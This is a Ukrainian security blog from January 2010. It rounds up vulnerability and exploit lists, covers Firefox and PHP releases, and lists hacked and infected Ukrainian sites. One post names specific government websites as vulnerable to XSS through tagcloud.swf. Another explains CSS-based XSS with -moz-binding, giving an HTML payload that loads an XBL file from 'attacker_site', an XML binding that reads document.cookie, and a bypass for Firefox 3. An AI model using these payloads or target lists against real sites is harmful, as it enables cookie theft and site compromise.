Добірка уразливостей

18:05 08.01.2010

В даній добірці уразливості в веб додатках:

  • SQL INJECTION VULNERABILITY LightOpen CMS Devel 0.1 (деталі)
  • Joomla! 1.5.10 JA_Purity Multiple Persistent XSS (деталі)
  • LightOpenCMS 0.1 pre-alpha Remote SQL Injection (деталі)
  • Oracle Database SQL Injection in SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE (деталі)
  • Oracle Database multiple SQL Injection vulnerabilities in Workspace Manager (деталі)
  • Oracle Database SQL Injection in SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE (деталі)
  • Oracle Database Multiple SQL Injection vulnerabilities in LTADM (деталі)
  • SQL INJECTION VULNERABILITY Kjtechforce mailman Beta-1 (деталі)
  • Zoki Catalog SQL Injection (деталі)
  • MULTIPLE LOCAL FILE INCLUSION VULNERABILITIES S-CMS <= v-2.0 Beta3 (деталі)

Вийшли Firefox 3.0.17 та Firefox 3.5.7

15:11 08.01.2010

Після виходу в грудні, 15.12.2009, Firefox 3.0.16, в якому було виправлено 5 уразливостей, в січні, 05.01.2010, вийшов Firefox 3.0.17. В якому не було зроблено жодних секюріті покращень і виправлень (хоча дірок в ньому вистачає, про що я неодноразово повідомляв Mozilla, але вони завжди ігнорували мої повідомлення про DoS і XSS уразливості в їхніх браузерах).

В останній версії Firefox був виправлений лише баг з презентацією оновлень користувачам.

Також в цей же день вийшов Firefox 3.5.7. В якому також не було зроблено жодних секюріті покращень і виправлень. Лише виправленна загальна проблема зі стабільністю (що може включати і DoS уразливість, але Mozilla любить відности це не до уразливостей, а до stability issue) та виправленний баг з презентацією оновлень користувачам.

XSS уразливості в tagcloud.swf на gov та gov.ua

23:54 07.01.2010

В своїй статті XSS уразливості в 8 мільйонах флеш файлах я писав, що по даним Гугла в Інтернеті є до 34 мільйонів флешек (tagcloud.swf) потенційно вразливих до XSS атак. Файл tagcloud.swf розроблений автором плагіна WP-Cumulus для WordPress і постачається з даним плагіном для WP, а також з іншими плагінами, зокрема Joomulus для Joomla.

Так як на багатьох державних сайтах використовуються різні движки до яких розроблені плагіни з даним swf-файлом (і відповідно дані сайти можуть бути вразливі до XSS), я приведу вам перелік вразливих державних сайтів різних країн. Наступні державні сайти мають Cross-Site Scripting уразливості у флешці tagcloud.swf.

XSS на gov сайтах (окрім державних сайтів України):

http://gibdd.tambov.gov.ru

http://dpw.ecprov.gov.za

http://media1.aso.gov.au

http://education.gov.lc

http://www.muskegon-mi.gov

На даному сайті використовується пропатчена версія WP-Cumulus, в якій виправлена XSS, але в якій все ще наявна HTML Injection.

XSS на gov.ua сайтах:

http://www.galych-rada.gov.ua

http://www.smida.gov.ua

http://cult.gov.ua

http://spacecenter.gov.ua

http://uit.umvs-kherson.gov.ua

http://letadm.gov.ua

http://old.smida.gov.ua

XSS атаки в Mozilla Firefox через стилі

21:34 07.01.2010

При наявності XSS уразливості на сайті, у випадку коли немає можливості використовувати кутові дужки (або при забороні необхідних html-тегів), можна провести атаку через стилі - через властивість style в html-об’єтах. ЇЇ можна використати в різних html-тегах: <a>, <p> та інших.

Дані атаки можуть проводитися як через reflected XSS, так і через persistent XSS уразливості. Зокрема в браузерах Mozilla і Firefox (та інших браузерах на движку Gecko), XSS атаки через стилі можуть проводитися за допомогою властивості -moz-binding.

Для XSS атаки на сайті http://site потрібно вказати в -moz-binding лінку на xml-файл з JS-кодом, який може знаходитися на будь-якому сайті (наприклад, http://attacker_site).

<p style="-moz-binding:url('http://attacker_site/xss.xml#xss')">XSS</p>

Приклад xml-файла для демонстрації XSS атаки:

<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl"
xmlns:html="http://www.w3.org/1999/xhtml">
<binding id="xss">
<implementation>
<constructor>
alert(document.cookie);
</constructor>
</implementation>
</binding>
</bindings>

Приклад подібної атаки з використанням -moz-binding я наводив на fileshare.in.ua.

Дані атаки працювали в браузерах Mozilla та Firefox до Firefox 3. Післі виходу 17.06.2008 Firefox 3 дані атаки перестали в ньому працювати, бо в Firefox 3 даний вектор XSS атаки був виправлений. Але виправлений лише частково і дане виправлення можна обійти і провести XSS атаку.

Для XSS атаки в Firefox 3 на сайті http://site потрібно розмістити xml-файл на даному сайті і вказати в -moz-binding лінку на xml-файл з JS-кодом. Шлях до xml-файла може бути абсолютним, або відносним.

<p style="-moz-binding:url('http://site/xss.xml#xss')">XSS</p>

Так що в версіях Firefox 3 і вище даний вектор XSS атаки все ще працює (при використанні xml-файла на тому самому сайті, де і XSS уразливість). І при наявності на сайті аплоадера для завантаження xml-файла, дану XSS атаку легко можно провести.

Для тих, кому потрібна автоматизована XSS атака (через inline-стилі), без використання -moz-binding, то для цього можна використати іншу техніку атаки (про яку я вже писав). Що буде працювати як на сайтах з аплоадерами, так і на всіх інших сайтах, як в Firefox 2 і попередніх версіях, так і в Firefox 3 і вище, а також в усіх інших браузерах.

З Різдвом Христовим!

18:25 07.01.2010

Поздоровляю вас з Різдвом Христовим!

У зв’язку зі святами - Новим Роком та Різдвом - пропоную подивитися мою святкову листівку на флеші.

Бажаю вам всього найкращого ;-) .

Добірка експлоітів

16:03 07.01.2010

В даній добірці експлоіти в веб додатках:

  • RS-CMS 2.1 (key) Remote SQL Injection Vulnerability (деталі)
  • Joomla Component com_tickets <= 2.1 (id) SQL Injection Vuln (деталі)
  • Sourcebans <= 1.4.2 Arbitrary Change Admin Email Vulnerability (деталі)
  • Kasseler CMS (FD/XSS) Multiple Remote Vulnerabilities (деталі)
  • Gravy Media Photo Host 1.0.8 Local File Disclosure Vulnerability (деталі)
  • Campsite 3.3.0 RC1 Multiple Remote File Inclusion Vulnerabilities (деталі)
  • Zen Cart 1.3.8 Remote SQL Execution Exploit (деталі)
  • Zen Cart 1.3.8 Remote Code Execution Exploit (деталі)
  • phpCollegeExchange 0.1.5c (RFI/LFI/XSS) Multiple Vulnerabilities (деталі)
  • Bitweaver <= 2.6 /boards/boards_rss.php / saveFeed() remote code execution exploit (деталі)

Похакані сайти №78

22:47 06.01.2010

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://superconnection.tv (хакером NuriBaba) - 01.01.2010, зараз сайт заблоковано
  • http://www.carillon.kiev.ua (хакером SALDIRAY) - 17.12.2009, зараз сайт вже виправлений адмінамий
  • http://4life.org.ua (хакером Th3 M4RoC4in GhOsT) - 29.12.2009, зараз сайт не працює
  • http://22usd.4life.org.ua (хакером Th3 M4RoC4in GhOsT) - 29.12.2009, взломаний піддомен сайта 4life.org.ua
  • http://bugtrack.begger.org (хакерами holocaust і BlackCAT)

Вийшов PHP 5.2.12

20:04 06.01.2010

У грудні, 17.12.2009, вийшов PHP 5.2.12. В якому виправлено більше 60 помилок, в тому числі й декілька уразливостей. Даний реліз направлений на покращення стабільності та безпеки гілки 5.2.x.

Cеред секюріті покращень та виправлень в PHP 5.2.12:

  • Виправлений обхід safe_mode в tempnam().
  • Виправлений обхід open_basedir в posix_mkfifo().
  • Додана “max_file_uploads” INI директива, що може бути задана для обмеження кількості завантажень файлів для кожного запиту до 20 по замовчуванню, для запобігання можливій DOS через вичерпання тимчасових файлів.
  • Доданий захист для $_SESSION проти пошкоджень і покращена перевірка “session.save_path”.
  • Виправлений баг #49785 (недостатня перевірка вхідного рядка в htmlspecialchars()).

По матеріалам http://www.php.net.

Добірка уразливостей

17:38 06.01.2010

В даній добірці уразливості в веб додатках:

  • Alcatel-Lucent OmniSwitch products, Stack Buffer Overflow (деталі)
  • New drupal6 packages fix insufficient input sanitising (деталі)
  • (Post Form –> ‘cc’) Blind (SQLi) EXPLOIT Online Grades & Attendance <= v3.2.6 (деталі)
  • MULTIPLE LOCAL FILE INCLUSION VULNERABILITIES Online Grades & Attendance <= v3.2.6 (деталі)
  • Nokia 6131 NFC URI/URL Spoofing and DoS Advisory (деталі)
  • moziloCMS 1.11.1 - XSS Vulnerability (деталі)
  • LightNEasy 2.2.2 - HTML Injection Vulnerability (деталі)
  • SiteCore.NET 6.0.0 - XSS Vulnerability (деталі)
  • Geeklog 1.5 - Pre-Installation Vulnerabilities (деталі)
  • Flatnux 2009-03-27 - XSS Vulnerabilities + More (деталі)

Інфіковані сайти №6

22:46 05.01.2010

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

Ось п’ятірка інфікованих сайтів в Уанеті:

  • http://kpi.ua - інфекція була виявлена 12.12.2009. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 6 разів протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
  • http://www.i.com.ua/~prophesy - інфекція була виявлена 16.10.2009. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 1 раз протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
  • http://victoria-company.dp.ua - інфекція була виявлена 27.11.2009. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 2 рази протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
  • http://kr-soft-portal.at.ua - інфекція була виявлена 03.01.2010. Зараз сайт входить до переліку підозрілих.
  • http://khmilnuk.com.ua - інфекція була виявлена 15.11.2009. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 2 рази протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.